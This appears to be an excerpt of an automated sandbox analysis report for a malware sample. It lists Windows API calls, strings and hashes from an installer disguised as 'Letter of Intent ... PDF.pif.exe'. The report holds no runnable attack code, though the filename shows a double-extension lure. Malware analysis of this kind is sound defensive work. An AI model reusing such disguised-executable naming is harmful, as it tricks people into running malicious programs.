                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                                                      • SendMessageW.USER32(00000000), ref: 004042B5
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042E0
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404331
                                                                                      • SetCursor.USER32(00000000), ref: 00404334
                                                                                      • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404355
                                                                                      • SetCursor.USER32(00000000), ref: 00404358
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                      • String ID: $@d$@.C$N$open
                                                                                      • API String ID: 3615053054-1772195069
                                                                                      • Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                                      • Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
                                                                                      • Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                                      • Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98
                                                                                      APIs
                                                                                      • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
                                                                                      • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F
                                                                                        • Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                                        • Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                                      • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
                                                                                      • wsprintfA.USER32 ref: 00405ACA
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405BCD
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405BD4
                                                                                        • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                        • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                      • API String ID: 3756836283-899692902
                                                                                      • Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                                      • Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
                                                                                      • Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                                      • Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                      • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                                                      • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                      • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
                                                                                      • MulDiv.KERNEL32(000D4D30,00000064,000D4F34), ref: 00402C5E
                                                                                      • wsprintfW.USER32 ref: 00402C6E
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402C7E
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: 0M$4O$verifying installer: %d%%
                                                                                      • API String ID: 1451636040-1775721334
                                                                                      • Opcode ID: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                                                      • Instruction ID: fc2375c20bf1a940e442d42f67f4bd9350dc1e6ed8ae84fb9db5d2f1b0513ae1
                                                                                      • Opcode Fuzzy Hash: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
                                                                                      • Instruction Fuzzy Hash: 28014F70640208BBEF24AF61DD49BEE3B69FB04309F008439FA06A91D0DBB89555CF59
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?), ref: 10002334
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 10002355
                                                                                      • CLSIDFromString.OLE32(?,00000000), ref: 10002362
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002380
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 1000239B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100023BD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                      • String ID: @Hmu
                                                                                      • API String ID: 3579998418-887474944
                                                                                      • Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                                                      • Instruction ID: 92ad864d7eaf777a3729ef1fd9657dd0a0a37f05fa24005ae91eac6ed31fbb47
                                                                                      • Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                                                      • Instruction Fuzzy Hash: F0418EB0504302EFF724DF649C84A6BB7E8FB443D0B11892EFA46C6199DB34AE44DB65
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                      Strings
                                                                                      • "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe", xrefs: 0040601E
                                                                                      • *?|<>/":, xrefs: 0040602C
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405FDB, 00405FE0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-2974516326
                                                                                      • Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                                      • Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
                                                                                      • Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                                      • Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
                                                                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                      • String ID: 8$C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp$C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll
                                                                                      • API String ID: 1453599865-890437612
                                                                                      • Opcode ID: 7f78652b3f9e30db941b6587a4f94fd1b252cbbd17b2e2df595ff4e6b2ebf496
                                                                                      • Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
                                                                                      • Opcode Fuzzy Hash: 7f78652b3f9e30db941b6587a4f94fd1b252cbbd17b2e2df595ff4e6b2ebf496
                                                                                      • Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404019
                                                                                      • GetSysColor.USER32(00000000), ref: 00404035
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404041
                                                                                      • SetBkMode.GDI32(?,?), ref: 0040404D
                                                                                      • GetSysColor.USER32(?), ref: 00404060
                                                                                      • SetBkColor.GDI32(?,?), ref: 00404070
                                                                                      • DeleteObject.GDI32(?), ref: 0040408A
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404094
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                      • Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
                                                                                      • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                      • Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54
                                                                                      APIs
                                                                                      • wsprintfW.USER32 ref: 10002484
                                                                                      • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,10001875,00000000), ref: 10002498
                                                                                        • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,74DEFFC0,100011AA,?,00000000), ref: 1000131E
                                                                                      • GlobalFree.KERNEL32(?), ref: 10002505
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 1000252E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2435812281-0
                                                                                      • Opcode ID: bb9e9b395051b3fca634c9c67a90cb730b3747ff24aa199545dded541c7a2836
                                                                                      • Instruction ID: f64b64ae4b2db59ab97b7ed59bafad1354160bd237cc2a2c65f80b4fe5cf6c60
                                                                                      • Opcode Fuzzy Hash: bb9e9b395051b3fca634c9c67a90cb730b3747ff24aa199545dded541c7a2836
                                                                                      • Instruction Fuzzy Hash: A931EFB1509616EFFA22CFA4CCD492BB7BCFB043D17224919FA429216DCB319C54DB24
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3294113728-0
                                                                                      • Opcode ID: ec19c0cd5bc519fbb29dc177204be171099b3653b359ab9f5decef06c1aeeacd
                                                                                      • Instruction ID: 2d0112b2776dca8d717dfd9e18d313b89dca9e7a3efaaf21f9fdf9ae57e92bf3
                                                                                      • Opcode Fuzzy Hash: ec19c0cd5bc519fbb29dc177204be171099b3653b359ab9f5decef06c1aeeacd
                                                                                      • Instruction Fuzzy Hash: CE317C72800128BBCF116FA5CE499AE7A79EF09364F10423AF521762E0CB794D419BA8
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
                                                                                      • GetMessagePos.USER32 ref: 004048E7
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404901
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401D44
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                      • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID: Times New Roman
                                                                                      • API String ID: 3808545654-927190056
                                                                                      APIs
                                                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001931
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001AC2
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001AC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FreeGlobal$lstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 176019282-0
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,1000214E,?,00000808), ref: 10001638
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,1000214E,?,00000808), ref: 1000163F
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,1000214E,?,00000808), ref: 10001653
                                                                                      • GetProcAddress.KERNEL32(1000214E,00000000), ref: 1000165A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001663
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
                                                                                      • wsprintfW.USER32 ref: 00404878
                                                                                      • SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004057B4
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004057BE
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3081826266
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
                                                                                      • GetTickCount.KERNEL32 ref: 00402CCC
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
